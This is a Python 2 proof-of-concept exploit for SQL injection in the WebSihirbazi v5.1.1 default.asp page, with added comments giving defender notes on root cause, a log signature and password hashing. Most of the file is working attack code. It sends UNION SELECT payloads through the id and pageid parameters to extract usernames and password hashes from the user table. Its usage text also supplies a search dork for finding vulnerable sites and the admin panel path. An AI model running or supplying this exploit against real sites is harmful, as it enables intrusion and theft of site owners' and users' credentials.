#!/usr/bin/python
#baltazar
#websihirbazi v5.1.1 SQL Injection
#b4ltazar[at]gmail[dot]com
import sys, re, time, urllib2
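# Proof-of-concept for a SQL injection in the WebSihirbazi default.asp page.
# Layout restored: the original listing had lost its indentation, and the
# "Example" usage string was split across two lines and fused with the next
# print statement, so the file could not be parsed.
#
# Defender notes:
#   * Root cause, as far as the request strings show: the numeric "id" and
#     "pageid" query parameters of default.asp reach a SQL statement
#     unescaped. The fix belongs in the application: bind those values as
#     integer parameters (or reject non-numeric input) instead of
#     concatenating them into the query.
#   * Log/WAF signature: requests to default.asp whose id/pageid value is a
#     negative number followed by "union all select", naming the
#     "kullaniciadi" and "sifre" columns of the "user" table.
#   * The script treats any run of 32 lowercase hex characters in the response
#     as a password hash. If the application really stores unsalted MD5
#     (not verifiable from this listing), move to a salted, slow password hash
#     and rotate credentials after any suspected hit.
print "\n\t b4ltazar[at]gmail[dot]com"
print "\t"

# The two request strings the script sends. A negative id makes the page's
# own query return no rows, so only the UNION-selected columns are rendered.
sql = ["default.asp?page=news&id=-2+union+all+select+0,kullaniciadi,sifre,3+from+user",
       "default.asp?pageid=-7+union+all+select+0,1,2,kullaniciadi,sifre,5+from+user"]

# Exactly one argument (the site) is required; otherwise print usage and stop.
if len(sys.argv) != 2:
    print "\nUsage: python websihirbazi.py <<site>>"
    print "\nExample: python websihirbazi.py www.site.com"
    print "\nDork: |Powered By WebSihirbazi "
    print "\nAdmin panel: http://target/path/yonetim"
    sys.exit(1)

# Normalise the argument into a base URL: drop a literal "/index.php",
# make sure it ends with "/" and starts with "http://".
host = sys.argv[1].replace("/index.php" , "")
if host[-1] != "/":
    host = host+"/"
if host[:7] != "http://":
    host = "http://"+host

print "\n[+] Site:" ,host
print "[+] SQL Loaded..." ,len(sql)
print "[+] Starting Scan...\n"

# The loop variable no longer reuses the name of the list it iterates
# (the original wrote "for sql in sql").
for payload in sql:
    # Fixed 3-second pause before each request.
    time.sleep(3)
    url = host+payload.replace("\n", "")
    print "[+] Trying:" ,url
    try:
        source = urllib2.urlopen(url).read()
        # Heuristic only: any 32 consecutive lowercase hex characters count as
        # a hit, so unrelated hex strings in the page are reported as well.
        md5s = re.findall("[a-f0-9]"*32,source)
        if len(md5s) >=1:
            print "[!]" ,url
            for md5 in md5s:
                print "\n[+]MD5:" ,md5
    except(urllib2.HTTPError):
        # HTTP error statuses are skipped silently; any other failure
        # (for example an unreachable host) still aborts the script.
        pass

print "\n[-] Exploit finished\n"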